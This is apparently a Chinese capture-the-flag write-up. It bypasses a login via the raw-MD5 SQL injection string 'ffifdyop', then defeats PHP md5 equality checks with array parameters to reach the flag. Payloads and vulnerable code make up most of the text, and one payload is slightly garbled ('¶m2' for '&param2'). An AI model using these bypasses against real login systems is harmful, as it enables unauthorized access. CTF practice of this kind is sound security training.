打开之后这个这破玩意
抓一下包发现了这个
select * from ‘admin’ where password=md5($pass,true)
百度了一下MD5()ture漏洞
https://blog.csdn.net/March97/article/details/81222922
输入一下百度到的密码:
ffifdyop
进入了另一个页面,注释里发现了:
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
= =赵总无处不在!!!
之前做过一道题,这种可以数组绕过
构造payload:
?a[]=1&b[]=2
又得到了一串PHP
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
同理,数组绕过!
构造payload:
?param1[]=1¶m2[]=2
拿到Flag!!!!!